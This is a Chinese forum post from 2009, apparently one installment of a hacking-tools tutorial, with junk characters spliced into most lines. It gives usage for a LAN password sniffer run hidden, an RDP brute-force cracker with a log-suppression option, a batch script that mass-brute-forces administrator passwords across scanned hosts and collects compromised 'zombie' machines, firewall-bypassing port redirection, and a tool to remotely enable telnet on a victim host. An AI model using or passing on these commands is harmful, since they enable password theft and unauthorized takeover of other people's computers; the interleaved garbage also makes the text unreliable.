TA的每日心情 | 开心 2014-7-28 21:47 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
9楼
楼主 |
发表于 2009-5-4 09:38:18
|
只看该作者
九:
+ N U2 s; m$ e f! @5 Q9 d3、命令行方式嗅探器: xsniff.exe
5 ]( b; a' I1 C) w6 L可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
1 w, Y* g: c8 D/ z+ U参数说明
" u: R0 ^7 \( g B/ P, _( b-tcp 输出TCP数据报
& p5 Y/ z/ h+ \: V$ M4 T1 `- G-udp 输出UDP数据报7 `/ E5 B# G- m: _( V0 g1 Z
-icmp 输出ICMP数据报/ b3 ^( x, Z* j4 d* c1 ~
-pass 过滤密码信息
( f, V; T1 ]1 p' Z7 C; Q' A-hide 后台运行/ {* d8 H3 O& E U5 ^8 e' ?8 k
-host 解析主机名
+ c9 \; x9 T; R2 e* B, V b4 P-addr IP地址 过滤IP地址
7 [% L" j# @' q; Y8 ~-port 端口 过滤端口
: D: S% y `* t8 f& z0 t& P! P-log 文件名 将输出保存到文件$ D) a- m, ^1 C) O9 X5 b' \
-asc 以ASCII形式输出
- e( ^ H4 H( v-hex 以16进制形式输出" S4 X3 f$ v8 U: b
用法示例
9 Q% h8 ~8 d8 h, a7 _: m0 U! V! e, ^xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中' F1 ^' `+ M! z6 K
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
% y: v$ `7 p, c% Z5 J4、终端服务密码破解: tscrack.exe
! w1 d% Q: c( q& A8 Q参数说明! w2 k$ i5 A9 ` f6 \# n z
-h 显示使用帮助6 s; v Q# B8 S3 \3 o R! N
-v 显示版本信息
$ m3 _) f6 ]- R1 A% _, O( ]. H5 B-s 在屏幕上打出解密能力
! W8 {& u; Q* [; f( l$ }3 z-b 密码错误时发出的声音+ U( d2 M, D5 j% N# v
-t 同是发出多个连接(多线程), X! L' ^5 R) X8 H8 l" r
-N Prevent System Log entries on targeted server
. s" s j5 W8 H- }: U-U 卸载移除tscrack组件
' ?4 S, F7 f! |; W2 k9 }' S-f 使用-f后面的密码
& Q1 Z; ^! v8 V( T0 C* c' b. L-F 间隔时间(频率)1 t: W7 i# M8 G# {' t6 \
-l 使用-l后面的用户名3 u/ A9 W. j% R/ d
-w 使用-w后面的密码字典* j" w, D1 K# @6 u" |: `6 ]$ O9 F! }8 T
-p 使用-p后面的密码
$ a; ^+ s. `' u# i; \-D 登录主页面
: o* D- e* D/ e0 E, w t, @用法示例/ o, G* ]2 ]. \3 [( u
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的admi7 e& K7 k% ?4 v% J4 X+ y( S7 [) w
nistrator的登陆密码
4 _8 g$ k0 c8 Z9 ttscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户
; n i5 ~2 f5 m# T2 W- m& u5 q@if not exist ipcscan.txt goto noscan
$ _/ L+ C: i. u* M8 f9 r1 G@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
- i- _. O( D, N6 c, qnscan
; k& W- @" r5 Z2 X0 b5 A( P@echo 3389.txt no find or scan faild
; ^) n4 S$ q" E$ p(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)9 Y! N, ]8 \( @ Z- F# v/ _1 d
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
- q, A o8 b. N4 t+ u@if not exist tscrack.exe goto noscan" o8 @$ k8 V+ d$ G
@tscrack %1 -l administrator -w pass.dic >>rouji.txt/ e& V, v( I0 F. L3 R# }
:noscan
0 W# x4 `2 n2 t8 U@echo tscrack.exe no find or scan faild/ J3 \# _5 O/ {. c3 g
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)+ @- Y( b5 E9 h0 C2 ~: K. q2 W
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。
- \" E6 i$ `& @/ E3 w5、其它:+ Z* i/ ^1 H4 P" O
Shutdown.exe. V$ B+ y8 j4 A7 u+ e
Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)2 }; p5 `* T' @, J
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
8 E* q- f9 t7 Z: V* f2 o* Q+ Kfpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息3 @2 a7 l w! X4 h. ^( x/ u$ u& ^1 m
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
' i2 }; l3 l$ K. X$ l- qOpenTelnet.exe (远程开启telnet工具)
& ~" Z2 c1 Q% k6 Y) f% w( Kopentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。
' }. a) I4 M+ ONTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。5 i! {4 V1 Y8 K/ w
ResumeTelnet.exe (OpenTelnet附带的另一个工具)0 p: r) G( Y* {! j q# B% h1 U
resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。' F+ ?8 F$ n! _$ \$ ]1 G! L
|
|